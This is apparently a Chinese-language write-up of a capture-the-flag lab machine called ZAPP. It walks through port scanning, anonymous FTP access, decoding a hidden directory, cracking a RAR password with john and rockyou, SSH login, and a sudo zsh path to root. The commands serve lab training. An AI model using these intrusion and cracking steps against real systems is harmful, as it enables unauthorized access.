ZAPP

信息搜集

10.156.131.242

端口扫描

root@LAPTOP-O235O5EH [~/Desktop/test] ➜  rustscan -a 10.156.131.242                                                                    [20:33:24]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 10.156.131.242:21
Open 10.156.131.242:22
Open 10.156.131.242:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 20:33 CST
Initiating ARP Ping Scan at 20:33
Scanning 10.156.131.242 [1 port]
Completed ARP Ping Scan at 20:33, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:33
Completed Parallel DNS resolution of 1 host. at 20:33, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:33
Scanning 10.156.131.242 [3 ports]
Discovered open port 80/tcp on 10.156.131.242
Discovered open port 22/tcp on 10.156.131.242
Discovered open port 21/tcp on 10.156.131.242
Completed SYN Stealth Scan at 20:33, 0.02s elapsed (3 total ports)
Nmap scan report for 10.156.131.242
Host is up, received arp-response (0.00061s latency).
Scanned at 2026-01-22 20:33:31 CST for 0s

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:87:1D:1F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

‍

21端口扫描

root@LAPTOP-O235O5EH [~/Desktop/test] ➜  nmap 10.156.131.242 -p 21 -sC                                                                 [20:40:57]
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 20:41 CST
Nmap scan report for 10.156.131.242
Host is up (0.00051s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.156.131.149
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              28 Oct 29 20:59 login.txt
|_-rw-r--r--    1 0        0              65 Oct 29 21:23 secret.txt
MAC Address: 08:00:27:87:1D:1F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.87 seconds

存在匿名登录

1	lftp 10.156.131.242 -u anonymous

目前不知道有什么用，先隔着

‍

80/tcp

主页中这个比较可以

还在主页源码中有一串base64多重加密的字符

使用CyberChef解密

经过测试发现这是目录

需要密码

‍

rar密码爆破

1 2	rar2john Sup3rP4ss.rar > hash john --format=rar5 --wordlist=/usr/share/wordlists/rockyou.txt hash

解压

root@LAPTOP-O235O5EH [~/Desktop/test] ➜  unrar x Sup3rP4ss.rar                                                                         [20:51:06]

UNRAR 7.20 beta 2 freeware      Copyright (c) 1993-2025 Alexander Roshal

Extracting from Sup3rP4ss.rar

Enter password (will not be echoed) for Sup3rP4ss.txt:


Would you like to replace the existing file Sup3rP4ss.txt
    34 bytes, modified on 2025-10-31 04:28
with a new one
    34 bytes, modified on 2025-10-31 04:28

[Y]es, [N]o, [A]ll, n[E]ver, [R]ename, [Q]uit y

Extracting  Sup3rP4ss.txt                                             OK
All OK

内容是

1 2	root@LAPTOP-O235O5EH [~/Desktop/test] ➜ cat Sup3rP4ss.txt [20:51:15] Intenta probar con más >> 3spuM4 #

猜测是密码，之前发现的zappskred是用户名

‍

zappskred shell

尝试登录发现成功

root@LAPTOP-O235O5EH [~/Desktop/test] ➜  ssh zappskred@10.156.131.242                                                                  [20:51:23]
The authenticity of host '10.156.131.242 (10.156.131.242)' can't be established.
ED25519 key fingerprint is: SHA256:oAQDgOtodLYaAEaFPgXG880suuG/9LzdUj9QDUv0CmI
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.156.131.242' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
    ███████╗ █████╗ ██████╗ ██████╗
 ╚══███╔╝██╔══██╗██╔══██╗██╔══██╗
   ███╔╝ ███████║██████╔╝██████╔╝
  ███╔╝  ██╔══██║██╔═══╝ ██╔═══╝
 ███████╗██║  ██║██║     ██║
 ╚══════╝╚═╝  ╚═╝╚═╝     ╚═╝


zappskred@10.156.131.242's password:
Permission denied, please try again.
zappskred@10.156.131.242's password:
Linux TheHackersLabs-ZAPP 5.10.0-36-amd64 #1 SMP Debian 5.10.244-1 (2025-09-29) x86_64

Last login: Sat Nov  1 03:15:28 2025 from 192.168.18.16
ZAPP
+)Creador: puerto4444
+)Nombre: ZAPP
+)IP: 10.156.131.242
----------------------------------------
zappskred@TheHackersLabs-ZAPP:~$

‍

提权

zappskred -> root

zappskred@TheHackersLabs-ZAPP:/opt$ sudo -l
sudo: unable to resolve host TheHackersLabs-ZAPP: Name or service not known
[sudo] password for zappskred:
Matching Defaults entries for zappskred on TheHackersLabs-ZAPP:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zappskred may run the following commands on TheHackersLabs-ZAPP:
    (root) /bin/zsh

可以以 root 用户身份运行 /bin/zsh， 无需密码

gtfobins上有现成的方案

https://gtfobins.org/gtfobins/zsh/